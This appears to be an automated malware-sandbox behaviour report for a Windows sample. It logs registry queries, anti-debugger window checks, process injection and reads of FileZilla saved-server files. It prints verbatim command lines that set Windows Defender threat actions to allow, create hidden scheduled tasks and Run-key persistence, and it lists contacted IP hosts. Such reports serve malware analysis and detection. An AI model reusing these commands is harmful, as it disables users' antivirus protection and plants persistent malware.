1 0 0

RegOpenKeyExW

regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x00000538
key_handle: 0x00000528
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2808
process_handle: 0x00000494
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2808
process_handle: 0x00000494
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2752
process_handle: 0x00000494
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2752
process_handle: 0x00000494
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2120
process_handle: 0x00000494
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2120
process_handle: 0x00000494
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
cmdline cmd /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
cmdline reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
host 147.45.47.126
host 147.45.47.155
host 185.172.128.19
host 185.215.113.67
host 77.91.77.81
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3016
region_size: 5447680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000380
3221225496 0

NtAllocateVirtualMemory

process_identifier: 3232
region_size: 364544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0

NtAllocateVirtualMemory

process_identifier: 2288
region_size: 364544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\a2772ea559.exe reg_value C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 reg_value C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
file C:\Windows\Tasks\axplong.job
file C:\Windows\Tasks\explortu.job
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Process injection Process 2828 manipulating memory of non-child process 3016
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3016
region_size: 5447680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000380
3221225496 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà ¶À“@@…öx0„Sœ÷”.textrµ¶ `.rdata7*Ð,º@@.data0.šæ@À.reloc„S0T€@B
base_address: 0x00400000
process_identifier: 3232
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3232
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà ¶À“@@…öx0„Sœ÷”.textrµ¶ `.rdata7*Ð,º@@.data0.šæ@À.reloc„S0T€@B
base_address: 0x00400000
process_identifier: 2288
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2288
process_handle: 0x00000248
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà ¶À“@@…öx0„Sœ÷”.textrµ¶ `.rdata7*Ð,º@@.data0.šæ@À.reloc„S0T€@B
base_address: 0x00400000
process_identifier: 3232
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà ¶À“@@…öx0„Sœ÷”.textrµ¶ `.rdata7*Ð,º@@.data0.šæ@À.reloc„S0T€@B
base_address: 0x00400000
process_identifier: 2288
process_handle: 0x00000248
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000528
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
Process injection Process 3176 called NtSetContextThread to modify thread in remote process 3232
Process injection Process 1868 called NtSetContextThread to modify thread in remote process 2288
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4232128
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 3232
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4232128
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 2288
1 0 0
cmd powershell start-process -windowstyle hidden gpupdate.exe /force"c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" "c:\program files (x86)\google\chrome\application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=kaaaaaaaaaaabwaaaqaaaaaaaaaaagaaaqaaaaaaaaaiaaaaaaaaacgaaaaeaaaaiaaaaaaaaaaoaaaaaaaaadaaaaaaaaaaoaaaaaaaaaaqaaaaaaaaaaaaaaakaaaaeaaaaaaaaaaaaaaacwaaabaaaaaaaaaaaqaaaaoaaaaqaaaaaaaaaaeaaaalaaaa --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=cb321edecf782d156857df85be4265f2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2"c:\program files (x86)\google\chrome\application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6"c:\users\test22\appdata\local\temp\1000017001\db324166b9.exe" "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" schtasks /create /sc minute /mo 1 /tn newkindr.exe /tr "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" /f"c:\users\test22\appdata\local\temp\9217037dc9\explortu.exe" "c:\program files (x86)\google\chrome\application\chrome.exe" --type=crashpad-handler "--user-data-dir=c:\users\test22\appdata\local\google\chrome\user data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\test22\appdata\local\google\chrome\user data\crashpad" "--metrics-dir=c:\users\test22\appdata\local\google\chrome\user data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=win64 --annotation=prod=chrome --annotation=ver=65.0.3325.181 